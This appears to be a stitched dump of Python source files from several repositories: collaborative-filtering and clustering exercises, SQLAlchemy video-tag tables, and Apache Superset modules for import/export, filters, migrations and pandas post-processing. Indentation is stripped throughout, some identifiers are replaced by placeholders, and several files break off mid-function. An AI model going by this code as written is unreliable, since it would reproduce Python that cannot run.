def sim_distance(prefs,person1,person2):
sum=0
for item,score in prefs[person1].items():
if item in prefs[person2]:
sum=sum+pow(score-prefs[person2][item],2)
if sum == 0:
return sum;
return 1/(1+sqrt(sum))
# Returns the Pearson correlation coefficient for p1 and p2
def sim_pearson(prefs,person1,person2):
si={}
for item in prefs[person1]:
if item in prefs[person2]:
si[item]=1
n=len(si)
if n == 0:
return 0
sum1=sum([prefs[person1][item] for item in si])
sum2=sum([prefs[person2][item] for item in si])
sqSum1=sum([pow(prefs[person1][item],2) for item in si])
sqSum2=sum([pow(prefs[person2][item],2) for item in si])
pSum=sum([prefs[person1][item]*prefs[person2][item] for item in si])
indp=sqrt((sqSum1-pow(sum1,2)/n)*(sqSum2-pow(sum2,2)/n))
if indp == 0:
return 0
cov=pSum-sum1*sum2/n
return cov/indp
# Returns the best matches for person from the prefs dictionary.
# Number of results and similarity function are optional params.
def topMatches(prefs,person,similarity=sim_distance,n=5):
scores=[(similarity(prefs,person,other),other) for other in prefs if person != other]
scores.sort()
scores.reverse()
return scores[0:n]
# Gets recommendations for a person by using a weighted average
# of every other user's rankings
def getRecommendations(prefs,person,similarity=sim_pearson):
totals={}
simSum={}
for other,rankings in prefs.items():
if other != person:
sim=similarity(prefs,person,other)
if sim < 0:
continue
for it,score in rankings.items():
if it not in prefs[person] or prefs[person][it] == 0:
totals.setdefault(it, 0)
totals[it] += sim * score
simSum.setdefault(it, 0)
simSum[it] += sim
recommendations=[(score/simSum[it],it) for it,score in totals.items()]
recommendations.sort()
recommendations.reverse()
return recommendations
def transformPrefs(prefs):
result={}
for user in prefs:
for item in prefs[user]:
result.setdefault(item,{})
result[item][user]=prefs[user][item]
return result
def calculateSimilarItems(prefs,n=10):
result={}
items=transformPrefs(prefs)
c=0
for it in items:
c+=1
if c%100==0: print "%d / %d" % (c,len(items))
result[it]=topMatches(items,it,sim_distance,n)
return result
def getRecommendedItems(prefs,itemMatch,user):
totals={}
simSum={}
for it,score in prefs[user].items():
for (sim,other) in itemMatch[it]:
if other not in prefs[user] or prefs[user][other] == 0:
totals.setdefault(other, 0)
totals[other] += sim * score
simSum.setdefault(other, 0)
simSum[other] += sim
recommendations=[(score/simSum[it],it) for it,score in totals.items()]
recommendations.sort()
recommendations.reverse()
return recommendations
#def loadMovieLens(path='/data/movielens'):
```
#### File: pci-code/chapter3/clusters.py
```python
def readfile(filename):
lines=[line for line in file(filename)]
# First line is the column titles
colnames=lines[0].strip().split('\t')[1:]
rownames=[]
data=[]
for line in lines[1:]:
p=line.strip().split('\t')
# First column in each row is the rowname
rownames.append(p[0])
# The data for this row is the remainder of the row
data.append([float(x) for x in p[1:]])
return rownames,colnames,data
from math import sqrt
def pearson(v1,v2):
sum1=sum(v1)
sum2=sum(v2)
sqSum1=sum([pow(v,2) for v in v1])
sqSum2=sum([pow(v,2) for v in v2])
n=len(v1)
pSum=sum([v1[i]*v2[i] for i in range(n)])
indp=sqrt((sqSum1-pow(sum1,2)/n)*(sqSum2-pow(sum2,2)/n))
if indp == 0:
return 0
cov=pSum-sum1*sum2/n
return 1-cov/indp
class biCluster:
def __init__(self,vec,left=None,right=None,distance=0.0,id=None):
self.vec=vec
self.left=left
self.right=right
self.distance=distance
self.id=id
def hcluster(rows,distance=pearson):
distances={}
currentClustId=-1
cluster=[biCluster(rows[i],id=i) for i in range(len(rows))]
while len(cluster) > 1:
lowestPair=(0,1)
closest=distance(cluster[0].vec,cluster[1].vec)
for i in range(len(cluster)):
for j in range(i+1,len(cluster)):
if (cluster[i].id,cluster[j].id) not in distances:
distances[(cluster[i].id,cluster[j].id)]=distance(cluster[i].vec,cluster[j].vec)
d=distances[(cluster[i].id,cluster[j].id)]
if d < closest:
closest=d
lowestPair=(i,j)
mergeVec=[(cluster[lowestPair[0]].vec[i]+cluster[lowestPair[1]].vec[i])/2 for i in range(len(rows[0]))]
newCluster=biCluster(mergeVec,cluster[lowestPair[0]],cluster[lowestPair[1]],closest,currentClustId)
currentClustId-=1
del cluster[lowestPair[1]]
del cluster[lowestPair[0]]
cluster.append(newCluster)
return cluster[0]
def printclust(clust,labels=None,n=0):
# indent to make a hierarchy layout
for i in range(n): print ' ',
if clust.id<0:
# negative id means that this is branch
print '-'
else:
# positive id means that this is an endpoint
if labels==None: print clust.id
else: print labels[clust.id]
# now print the right and left branches
if clust.left!=None: printclust(clust.left,labels=labels,n=n+1)
if clust.right!=None: printclust(clust.right,labels=labels,n=n+1)
#def getheight(clust):
#def getdepth(clust):
#def drawdendrogram(clust,labels,jpeg='clusters.jpg'):
#def drawnode(draw,clust,x,y,scaling,labels):
def rotateMatrix(data):
newData=[]
for i in range(len(data[0])):
newRow=[data[j][i] for j in range(len(data))]
newData.append(newRow)
return newData
#import random
#def kcluster(rows,distance=pearson,k=4):
#def tanamoto(v1,v2):
#def scaledown(data,distance=pearson,rate=0.01):
#def draw2d(data,labels,jpeg='mds2d.jpg'):
```
#### File: pci-code/chapter7/zillow.py
```python
import xml.dom.minidom
import urllib2
zwskey='<KEY>'
def getaddressdata(address,city):
escad=address.replace(' ','+')
# Construct the URL
url='http://www.zillow.com/webservice/GetDeepSearchResults.htm?'
url+='zws-id=%s&address=%scitystatezip=%s' % (zwskey,escad,city)
# Parse resulting XML
``` |
{
"source": "7venheavens/henpy",
"score": 3
} |
#### File: henpy/persist/tables.py
```python
from sqlalchemy import Column, ForeignKey, Integer, String, Date, Table
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
Base = declarative_base()
# Association table for many2many video tag relatiojn
video_tag = Table("video_tag", Base.metadata,
Column("video_id", Integer, ForeignKey("video.id")),
Column("tag_id", Integer, ForeignKey("tag.id")),)
class Tag(Base):
"""
@attrs
id
name
data
"""
__tablename__ = "tag"
id = Column(Integer, primary_key=True)
name = Column(String(255), nullable=False)
data = relationship("TagData")
videos = relationship(
"Video",
secondary=video_tag,
back_populates="tags")
class TagData(Base):
"""Language specific tag data
@attrs
id
tag
language
name
display_name
"""
__tablename__ = "tag_data"
id = Column(Integer, primary_key=True)
tag_id = Column(Integer, ForeignKey("tag.id"))
type = Column(String(255))
language = Column(String(20), nullable=False)
name = Column(String(255), nullable=False, index=True)
display_name = Column(String(255), nullable=False)
class Video(Base):
__tablename__ = "video"
id = Column(Integer, primary_key=True)
code = Column(String(50), nullable=False, index=True)
release_date = Column(Date, index=True)
image_path = Column(String(255), nullable=True) # Images are optional
director = Column(String(100), nullable=False)
maker = Column(String(100), nullable=False)
label = Column(String(100), nullable=False)
tags = relationship(
"Tag",
secondary=video_tag,
back_populates="videos")
def __repr__(self):
return self.__str__()
def __str__(self):
return f"<VideoMetadata:code={self.code}>"
class VideoData(Base):
"""Video data containing language requirements
"""
__tablename__ = "video_data"
id = Column(Integer, primary_key=True)
title = Column(String(100), nullable=False)
language = Column(String(20), nullable=False)
``` |
{
"source": "7vikpeculiar/superset",
"score": 2
} |
#### File: importers/v1/__init__.py
```python
from typing import Any, Dict, List, Optional, Set
from marshmallow import Schema, validate
from marshmallow.exceptions import ValidationError
from sqlalchemy.orm import Session
from superset import db
from superset.commands.base import BaseCommand
from superset.commands.exceptions import CommandException, CommandInvalidError
from superset.commands.importers.v1.utils import (
load_configs,
load_metadata,
load_yaml,
METADATA_FILE_NAME,
validate_metadata_type,
)
from superset.dao.base import BaseDAO
from superset.models.core import Database
class ImportModelsCommand(BaseCommand):
"""Import models"""
dao = BaseDAO
model_name = "model"
prefix = ""
schemas: Dict[str, Schema] = {}
import_error = CommandException
# pylint: disable=unused-argument
def __init__(self, contents: Dict[str, str], *args: Any, **kwargs: Any):
self.contents = contents
self.passwords: Dict[str, str] = kwargs.get("passwords") or {}
self.overwrite: bool = kwargs.get("overwrite", False)
self._configs: Dict[str, Any] = {}
@staticmethod
def _import(
session: Session, configs: Dict[str, Any], overwrite: bool = False
) -> None:
raise NotImplementedError("Subclasses MUST implement _import")
@classmethod
def _get_uuids(cls) -> Set[str]:
return {str(model.uuid) for model in db.session.query(cls.dao.model_cls).all()}
def run(self) -> None:
self.validate()
# rollback to prevent partial imports
try:
self._import(db.session, self._configs, self.overwrite)
db.session.commit()
except Exception as ex:
db.session.rollback()
raise self.import_error() from ex
def validate(self) -> None:
exceptions: List[ValidationError] = []
# verify that the metadata file is present and valid
try:
metadata: Optional[Dict[str, str]] = load_metadata(self.contents)
except ValidationError as exc:
exceptions.append(exc)
metadata = None
if self.dao.model_cls:
validate_metadata_type(metadata, self.dao.model_cls.__name__, exceptions)
# load the configs and make sure we have confirmation to overwrite existing models
self._configs = load_configs(
self.contents, self.schemas, self.passwords, exceptions
)
self._prevent_overwrite_existing_model(exceptions)
if exceptions:
exception = CommandInvalidError(f"Error importing {self.model_name}")
exception.add_list(exceptions)
raise exception
def _prevent_overwrite_existing_model( # pylint: disable=invalid-name
self, exceptions: List[ValidationError]
) -> None:
"""check if the object exists and shouldn't be overwritten"""
if not self.overwrite:
existing_uuids = self._get_uuids()
for file_name, config in self._configs.items():
if (
file_name.startswith(self.prefix)
and config["uuid"] in existing_uuids
):
exceptions.append(
ValidationError(
{
file_name: (
f"{self.model_name.title()} already exists "
"and `overwrite=true` was not passed"
),
}
)
)
```
#### File: dashboards/commands/export.py
```python
import json
import logging
import random
import string
from typing import Any, Dict, Iterator, Optional, Set, Tuple
import yaml
from werkzeug.utils import secure_filename
from superset.charts.commands.export import ExportChartsCommand
from superset.dashboards.commands.exceptions import DashboardNotFoundError
from superset.dashboards.commands.importers.v1.utils import find_chart_uuids
from superset.dashboards.dao import DashboardDAO
from superset.commands.export.models import ExportModelsCommand
from superset.datasets.commands.export import ExportDatasetsCommand
from superset.datasets.dao import DatasetDAO
from superset.models.dashboard import Dashboard
from superset.models.slice import Slice
from superset.utils.dict_import_export import EXPORT_VERSION
logger = logging.getLogger(__name__)
# keys stored as JSON are loaded and the prefix/suffix removed
JSON_KEYS = {"position_json": "position", "json_metadata": "metadata"}
DEFAULT_CHART_HEIGHT = 50
DEFAULT_CHART_WIDTH = 4
def suffix(length: int = 8) -> str:
return "".join(
random.SystemRandom().choice(string.ascii_uppercase + string.digits)
for _ in range(length)
)
def get_default_position(title: str) -> Dict[str, Any]:
return {
"DASHBOARD_VERSION_KEY": "v2",
"ROOT_ID": {"children": ["GRID_ID"], "id": "ROOT_ID", "type": "ROOT"},
"GRID_ID": {
"children": [],
"id": "GRID_ID",
"parents": ["ROOT_ID"],
"type": "GRID",
},
"HEADER_ID": {"id": "HEADER_ID", "meta": {"text": title}, "type": "HEADER"},
}
def append_charts(position: Dict[str, Any], charts: Set[Slice]) -> Dict[str, Any]:
chart_hashes = [f"CHART-{suffix()}" for _ in charts]
# if we have ROOT_ID/GRID_ID, append orphan charts to a new row inside the grid
row_hash = None
if "ROOT_ID" in position and "GRID_ID" in position["ROOT_ID"]["children"]:
row_hash = f"ROW-N-{suffix()}"
position["GRID_ID"]["children"].append(row_hash)
position[row_hash] = {
"children": chart_hashes,
"id": row_hash,
"meta": {"0": "ROOT_ID", "background": "BACKGROUND_TRANSPARENT"},
"type": "ROW",
"parents": ["ROOT_ID", "GRID_ID"],
}
for chart_hash, chart in zip(chart_hashes, charts):
position[chart_hash] = {
"children": [],
"id": chart_hash,
"meta": {
"chartId": chart.id,
"height": DEFAULT_CHART_HEIGHT,
"sliceName": chart.slice_name,
"uuid": str(chart.uuid),
"width": DEFAULT_CHART_WIDTH,
},
"type": "CHART",
}
if row_hash:
position[chart_hash]["parents"] = ["ROOT_ID", "GRID_ID", row_hash]
return position
class ExportDashboardsCommand(ExportModelsCommand):
dao = DashboardDAO
not_found = DashboardNotFoundError
# pylint: disable=too-many-locals
@staticmethod
def _export(
model: Dashboard, export_related: bool = True
) -> Iterator[Tuple[str, str]]:
dashboard_slug = secure_filename(model.dashboard_title)
file_name = f"dashboards/{dashboard_slug}.yaml"
payload = model.export_to_dict(
recursive=False,
include_parent_ref=False,
include_defaults=True,
export_uuids=True,
)
# TODO (betodealmeida): move this logic to export_to_dict once this
# becomes the default export endpoint
for key, new_name in JSON_KEYS.items():
value: Optional[str] = payload.pop(key, None)
if value:
try:
payload[new_name] = json.loads(value)
except (TypeError, json.decoder.JSONDecodeError):
logger.info("Unable to decode `%s` field: %s", key, value)
payload[new_name] = {}
# Extract all native filter datasets and replace native
# filter dataset references with uuid
for native_filter in payload.get("metadata", {}).get(
"native_filter_configuration", []
):
for target in native_filter.get("targets", []):
dataset_id = target.pop("datasetId", None)
if dataset_id is not None:
dataset = DatasetDAO.find_by_id(dataset_id)
if dataset:
target["datasetUuid"] = str(dataset.uuid)
if export_related:
yield from ExportDatasetsCommand([dataset_id]).run()
# the mapping between dashboard -> charts is inferred from the position
# attribute, so if it's not present we need to add a default config
if not payload.get("position"):
payload["position"] = get_default_position(model.dashboard_title)
# if any charts or not referenced in position, we need to add them
# in a new row
referenced_charts = find_chart_uuids(payload["position"])
orphan_charts = {
chart for chart in model.slices if str(chart.uuid) not in referenced_charts
}
if orphan_charts:
payload["position"] = append_charts(payload["position"], orphan_charts)
payload["version"] = EXPORT_VERSION
file_content = yaml.safe_dump(payload, sort_keys=False)
yield file_name, file_content
if export_related:
chart_ids = [chart.id for chart in model.slices]
yield from ExportChartsCommand(chart_ids).run()
```
#### File: dashboards/filter_sets/schemas.py
```python
from typing import Any, cast, Dict, Mapping
from marshmallow import fields, post_load, Schema, ValidationError
from marshmallow.validate import Length, OneOf
from superset.dashboards.filter_sets.consts import (
DASHBOARD_OWNER_TYPE,
JSON_METADATA_FIELD,
OWNER_ID_FIELD,
OWNER_TYPE_FIELD,
USER_OWNER_TYPE,
)
class JsonMetadataSchema(Schema):
nativeFilters = fields.Mapping(required=True, allow_none=False)
dataMask = fields.Mapping(required=False, allow_none=False)
class FilterSetSchema(Schema):
json_metadata_schema: JsonMetadataSchema = JsonMetadataSchema()
def _validate_json_meta_data(self, json_meta_data: str) -> None:
try:
self.json_metadata_schema.loads(json_meta_data)
except Exception as ex:
raise ValidationError("failed to parse json_metadata to json") from ex
class FilterSetPostSchema(FilterSetSchema):
json_metadata_schema: JsonMetadataSchema = JsonMetadataSchema()
# pylint: disable=W0613
name = fields.String(
required=True,
allow_none=False,
validate=Length(0, 500),
)
description = fields.String(
required=False, allow_none=True, validate=[Length(1, 1000)]
)
json_metadata = fields.String(allow_none=False, required=True)
owner_type = fields.String(
required=True, validate=OneOf([USER_OWNER_TYPE, DASHBOARD_OWNER_TYPE])
)
owner_id = fields.Int(required=False)
@post_load
def validate(
self, data: Mapping[Any, Any], *, many: Any, partial: Any
) -> Dict[str, Any]:
self._validate_json_meta_data(data[JSON_METADATA_FIELD])
if data[OWNER_TYPE_FIELD] == USER_OWNER_TYPE and OWNER_ID_FIELD not in data:
raise ValidationError("owner_id is mandatory when owner_type is User")
return cast(Dict[str, Any], data)
class FilterSetPutSchema(FilterSetSchema):
name = fields.String(required=False, allow_none=False, validate=Length(0, 500))
description = fields.String(
required=False, allow_none=False, validate=[Length(1, 1000)]
)
json_metadata = fields.String(required=False, allow_none=False)
owner_type = fields.String(
allow_none=False, required=False, validate=OneOf([DASHBOARD_OWNER_TYPE])
)
@post_load
def validate( # pylint: disable=unused-argument
self, data: Mapping[Any, Any], *, many: Any, partial: Any
) -> Dict[str, Any]:
if JSON_METADATA_FIELD in data:
self._validate_json_meta_data(data[JSON_METADATA_FIELD])
return cast(Dict[str, Any], data)
def validate_pair(first_field: str, second_field: str, data: Dict[str, Any]) -> None:
if first_field in data and second_field not in data:
raise ValidationError(
"{} must be included alongside {}".format(first_field, second_field)
)
```
#### File: superset/databases/filters.py
```python
from typing import Any, Set
from flask import g
from flask_babel import lazy_gettext as _
from sqlalchemy import or_
from sqlalchemy.orm import Query
from sqlalchemy.sql.expression import cast
from sqlalchemy.sql.sqltypes import JSON
from superset import app, security_manager
from superset.models.core import Database
from superset.views.base import BaseFilter
def can_access_databases(
view_menu_name: str,
) -> Set[str]:
return {
security_manager.unpack_database_and_schema(vm).database
for vm in security_manager.user_view_menu_names(view_menu_name)
}
class DatabaseFilter(BaseFilter): # pylint: disable=too-few-public-methods
# TODO(bogdan): consider caching.
def apply(self, query: Query, value: Any) -> Query:
if security_manager.can_access_all_databases():
return query
database_perms = security_manager.user_view_menu_names("database_access")
schema_access_databases = can_access_databases("schema_access")
datasource_access_databases = can_access_databases("datasource_access")
return query.filter(
or_(
self.model.perm.in_(database_perms),
self.model.database_name.in_(
[*schema_access_databases, *datasource_access_databases]
),
)
)
class DatabaseUploadEnabledFilter(BaseFilter): # pylint: disable=too-few-public-methods
"""
Custom filter for the GET list that filters all databases based on allow_file_upload
"""
name = _("Upload Enabled")
arg_name = "upload_is_enabled"
def apply(self, query: Query, value: Any) -> Query:
filtered_query = query.filter(Database.allow_file_upload)
datasource_access_databases = can_access_databases("datasource_access")
if hasattr(g, "user"):
allowed_schemas = [
app.config["ALLOWED_USER_CSV_SCHEMA_FUNC"](db, g.user)
for db in datasource_access_databases
]
if len(allowed_schemas):
return filtered_query
return filtered_query.filter(
or_(
cast(Database.extra, JSON)["schemas_allowed_for_file_upload"]
is not None,
cast(Database.extra, JSON)["schemas_allowed_for_file_upload"] != [],
)
)
```
#### File: superset/db_engine_specs/duckdb.py
```python
from __future__ import annotations
import re
from datetime import datetime
from typing import Any, Dict, List, Optional, Pattern, Tuple, TYPE_CHECKING
from flask_babel import gettext as __
from sqlalchemy.engine.reflection import Inspector
from superset.db_engine_specs.base import BaseEngineSpec
from superset.errors import SupersetErrorType
from superset.utils import core as utils
if TYPE_CHECKING:
# prevent circular imports
from superset.models.core import Database
COLUMN_DOES_NOT_EXIST_REGEX = re.compile("no such column: (?P<column_name>.+)")
class DuckDBEngineSpec(BaseEngineSpec):
engine = "duckdb"
engine_name = "DuckDB"
_time_grain_expressions = {
None: "{col}",
"PT1S": "DATE_TRUNC('second', {col})",
"PT1M": "DATE_TRUNC('minute', {col})",
"PT1H": "DATE_TRUNC('hour', {col})",
"P1D": "DATE_TRUNC('day', {col})",
"P1W": "DATE_TRUNC('week', {col})",
"P1M": "DATE_TRUNC('month', {col})",
"P0.25Y": "DATE_TRUNC('quarter', {col})",
"P1Y": "DATE_TRUNC('year', {col})",
}
custom_errors: Dict[Pattern[str], Tuple[str, SupersetErrorType, Dict[str, Any]]] = {
COLUMN_DOES_NOT_EXIST_REGEX: (
__('We can\'t seem to resolve the column "%(column_name)s"'),
SupersetErrorType.COLUMN_DOES_NOT_EXIST_ERROR,
{},
),
}
@classmethod
def epoch_to_dttm(cls) -> str:
return "datetime({col}, 'unixepoch')"
@classmethod
def convert_dttm(
cls, target_type: str, dttm: datetime, db_extra: Optional[Dict[str, Any]] = None
) -> Optional[str]:
tt = target_type.upper()
if tt in (utils.TemporalType.TEXT, utils.TemporalType.DATETIME):
return f"""'{dttm.isoformat(sep=" ", timespec="microseconds")}'"""
return None
@classmethod
def get_table_names(
cls, database: Database, inspector: Inspector, schema: Optional[str]
) -> List[str]:
"""Need to disregard the schema for DuckDB"""
return sorted(inspector.get_table_names())
```
#### File: migrations/shared/utils.py
```python
import logging
import os
import time
from typing import Any
from uuid import uuid4
from alembic import op
from sqlalchemy import engine_from_config
from sqlalchemy.dialects.mysql.base import MySQLDialect
from sqlalchemy.dialects.postgresql.base import PGDialect
from sqlalchemy.engine import reflection
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.orm import Session
logger = logging.getLogger(__name__)
DEFAULT_BATCH_SIZE = int(os.environ.get("BATCH_SIZE", 1000))
def table_has_column(table: str, column: str) -> bool:
"""
Checks if a column exists in a given table.
:param table: A table name
:param column: A column name
:returns: True iff the column exists in the table
"""
config = op.get_context().config
engine = engine_from_config(
config.get_section(config.config_ini_section), prefix="sqlalchemy."
)
insp = reflection.Inspector.from_engine(engine)
try:
return any(col["name"] == column for col in insp.get_columns(table))
except NoSuchTableError:
return False
uuid_by_dialect = {
MySQLDialect: "UNHEX(REPLACE(CONVERT(UUID() using utf8mb4), '-', ''))",
PGDialect: "uuid_in(md5(random()::text || clock_timestamp()::text)::cstring)",
}
def assign_uuids(
model: Any, session: Session, batch_size: int = DEFAULT_BATCH_SIZE
) -> None:
"""Generate new UUIDs for all rows in a table"""
bind = op.get_bind()
table_name = model.__tablename__
count = session.query(model).count()
# silently skip if the table is empty (suitable for db initialization)
if count == 0:
return
start_time = time.time()
print(f"\nAdding uuids for `{table_name}`...")
# Use dialect specific native SQL queries if possible
for dialect, sql in uuid_by_dialect.items():
if isinstance(bind.dialect, dialect):
op.execute(
f"UPDATE {dialect().identifier_preparer.quote(table_name)} SET uuid = {sql}"
)
print(f"Done. Assigned {count} uuids in {time.time() - start_time:.3f}s.\n")
return
# Othwewise Use Python uuid function
start = 0
while start < count:
end = min(start + batch_size, count)
for obj in session.query(model)[start:end]:
obj.uuid = uuid4()
session.merge(obj)
session.commit()
if start + batch_size < count:
print(f" uuid assigned to {end} out of {count}\r", end="")
start += batch_size
print(f"Done. Assigned {count} uuids in {time.time() - start_time:.3f}s.\n")
```
#### File: migrations/versions/3ba29ecbaac5_change_datatype_of_type_in_basecolumn.py
```python
revision = "<KEY>"
down_revision = "abe27eaf<PASSWORD>"
import sqlalchemy as sa
from alembic import op
def upgrade():
with op.batch_alter_table("table_columns") as batch_op:
batch_op.alter_column(
"type", existing_type=sa.VARCHAR(length=32), type_=sa.TEXT()
)
def downgrade():
with op.batch_alter_table("table_columns") as batch_op:
batch_op.alter_column(
"type", existing_type=sa.TEXT(), type_=sa.VARCHAR(length=32)
)
```
#### File: migrations/versions/8b841273bec3_sql_lab_models_database_constraint_updates.py
```python
revision = "8b841273bec3"
down_revision = "2<PASSWORD>"
import sqlalchemy as sa
from alembic import op
from superset.utils.core import generic_find_fk_constraint_name
def upgrade():
bind = op.get_bind()
insp = sa.engine.reflection.Inspector.from_engine(bind)
with op.batch_alter_table("tab_state") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"client_id"}, "query", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"tab_state_database_id_fkey",
"dbs",
["database_id"],
["id"],
ondelete="CASCADE",
)
batch_op.create_foreign_key(
"tab_state_latest_query_id_fkey",
"query",
["latest_query_id"],
["client_id"],
ondelete="SET NULL",
)
with op.batch_alter_table("table_schema") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"table_schema", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"table_schema_database_id_fkey",
"dbs",
["database_id"],
["id"],
ondelete="CASCADE",
)
def downgrade():
bind = op.get_bind()
insp = sa.engine.reflection.Inspector.from_engine(bind)
with op.batch_alter_table("tab_state") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"client_id"}, "query", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"tab_state_database_id_fkey", "dbs", ["database_id"], ["id"]
)
batch_op.create_foreign_key(
"tab_state_latest_query_id_fkey",
"query",
["latest_query_id"],
["client_id"],
)
with op.batch_alter_table("table_schema") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"table_schema", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"table_schema_database_id_fkey", "dbs", ["database_id"], ["id"]
)
```
#### File: superset/models/embedded_dashboard.py
```python
import uuid
from typing import List
from flask_appbuilder import Model
from sqlalchemy import Column, ForeignKey, Integer, Text
from sqlalchemy.orm import relationship
from sqlalchemy_utils import UUIDType
from superset.models.helpers import AuditMixinNullable
class EmbeddedDashboard(Model, AuditMixinNullable):
"""
A configuration of embedding for a dashboard.
Currently, the only embeddable resource is the Dashboard.
If we add new embeddable resource types, this model should probably be renamed.
References the dashboard, and contains a config for embedding that dashboard.
This data model allows multiple configurations for a given dashboard,
but at this time the API only allows setting one.
"""
__tablename__ = "embedded_dashboards"
uuid = Column(UUIDType(binary=True), default=uuid.uuid4, primary_key=True)
allow_domain_list = Column(Text) # reference the `allowed_domains` property instead
dashboard_id = Column(Integer, ForeignKey("dashboards.id"), nullable=False)
dashboard = relationship(
"Dashboard",
back_populates="embedded",
foreign_keys=[dashboard_id],
)
@property
def allowed_domains(self) -> List[str]:
"""
A list of domains which are allowed to embed the dashboard.
An empty list means any domain can embed.
"""
return self.allow_domain_list.split(",") if self.allow_domain_list else []
```
#### File: reports/commands/base.py
```python
import logging
from typing import Any, Dict, List
from marshmallow import ValidationError
from superset.charts.dao import ChartDAO
from superset.commands.base import BaseCommand
from superset.dashboards.dao import DashboardDAO
from superset.models.reports import ReportCreationMethodType
from superset.reports.commands.exceptions import (
ChartNotFoundValidationError,
ChartNotSavedValidationError,
DashboardNotFoundValidationError,
DashboardNotSavedValidationError,
ReportScheduleChartOrDashboardValidationError,
)
logger = logging.getLogger(__name__)
class BaseReportScheduleCommand(BaseCommand):
_properties: Dict[str, Any]
def run(self) -> Any:
pass
def validate(self) -> None:
pass
def validate_chart_dashboard(
self, exceptions: List[ValidationError], update: bool = False
) -> None:
"""Validate chart or dashboard relation"""
chart_id = self._properties.get("chart")
dashboard_id = self._properties.get("dashboard")
creation_method = self._properties.get("creation_method")
if creation_method == ReportCreationMethodType.CHARTS and not chart_id:
# User has not saved chart yet in Explore view
exceptions.append(ChartNotSavedValidationError())
return
if creation_method == ReportCreationMethodType.DASHBOARDS and not dashboard_id:
exceptions.append(DashboardNotSavedValidationError())
return
if chart_id and dashboard_id:
exceptions.append(ReportScheduleChartOrDashboardValidationError())
if chart_id:
chart = ChartDAO.find_by_id(chart_id)
if not chart:
exceptions.append(ChartNotFoundValidationError())
self._properties["chart"] = chart
elif dashboard_id:
dashboard = DashboardDAO.find_by_id(dashboard_id)
if not dashboard:
exceptions.append(DashboardNotFoundValidationError())
self._properties["dashboard"] = dashboard
elif not update:
exceptions.append(ReportScheduleChartOrDashboardValidationError())
```
#### File: utils/pandas_postprocessing/compare.py
```python
from typing import List, Optional
import pandas as pd
from flask_babel import gettext as _
from pandas import DataFrame
from superset.constants import PandasPostprocessingCompare
from superset.exceptions import InvalidPostProcessingError
from superset.utils.core import TIME_COMPARISON
from superset.utils.pandas_postprocessing.utils import validate_column_args
@validate_column_args("source_columns", "compare_columns")
def compare( # pylint: disable=too-many-arguments
df: DataFrame,
source_columns: List[str],
compare_columns: List[str],
compare_type: PandasPostprocessingCompare,
drop_original_columns: Optional[bool] = False,
precision: Optional[int] = 4,
) -> DataFrame:
"""
Calculate column-by-column changing for select columns.
:param df: DataFrame on which the compare will be based.
:param source_columns: Main query columns
:param compare_columns: Columns being compared
:param compare_type: Type of compare. Choice of `absolute`, `percentage` or `ratio`
:param drop_original_columns: Whether to remove the source columns and
compare columns.
:param precision: Round a change rate to a variable number of decimal places.
:return: DataFrame with compared columns.
:raises InvalidPostProcessingError: If the request in incorrect.
"""
if len(source_columns) != len(compare_columns):
raise InvalidPostProcessingError(
_("`compare_columns` must have the same length as `source_columns`.")
)
if compare_type not in tuple(PandasPostprocessingCompare):
raise InvalidPostProcessingError(
_("`compare_type` must be `difference`, `percentage` or `ratio`")
)
if len(source_columns) == 0:
return df
for s_col, c_col in zip(source_columns, compare_columns):
s_df = df.loc[:, [s_col]]
s_df.rename(columns={s_col: "__intermediate"}, inplace=True)
c_df = df.loc[:, [c_col]]
c_df.rename(columns={c_col: "__intermediate"}, inplace=True)
if compare_type == PandasPostprocessingCompare.DIFF:
diff_df = s_df - c_df
elif compare_type == PandasPostprocessingCompare.PCT:
diff_df = ((s_df - c_df) / c_df).astype(float).round(precision)
else:
# compare_type == "ratio"
diff_df = (s_df / c_df).astype(float).round(precision)
diff_df.rename(
columns={
"__intermediate": TIME_COMPARISON.join([compare_type, s_col, c_col])
},
inplace=True,
)
df = pd.concat([df, diff_df], axis=1)
if drop_original_columns:
df = df.drop(source_columns + compare_columns, axis=1)
return df
```
#### File: utils/pandas_postprocessing/diff.py
```python
from typing import Dict
from pandas import DataFrame
from superset.constants import PandasAxis
from superset.utils.pandas_postprocessing.utils import (
_append_columns,
validate_column_args,
)
@validate_column_args("columns")
def diff(
df: DataFrame,
columns: Dict[str, str],
periods: int = 1,
axis: PandasAxis = PandasAxis.ROW,
) -> DataFrame:
"""
Calculate row-by-row or column-by-column difference for select columns.
:param df: DataFrame on which the diff will be based.
:param columns: columns on which to perform diff, mapping source column to
target column. For instance, `{'y': 'y'}` will replace the column `y` with
the diff value in `y`, while `{'y': 'y2'}` will add a column `y2` based
on diff values calculated from `y`, leaving the original column `y`
unchanged.
:param periods: periods to shift for calculating difference.
:param axis: 0 for row, 1 for column. default 0.
:return: DataFrame with diffed columns
:raises InvalidPostProcessingError: If the request in incorrect
"""
df_diff = df[columns.keys()]
df_diff = df_diff.diff(periods=periods, axis=axis)
return _append_columns(df, df_diff, columns)
```
#### File: data_loading/data_definitions/types.py
```python
from abc import ABC, abstractmethod
from dataclasses import dataclass
from typing import Any, Dict, Iterable, Optional
from sqlalchemy.types import TypeEngine
@dataclass
class TableMetaData:
table_name: str
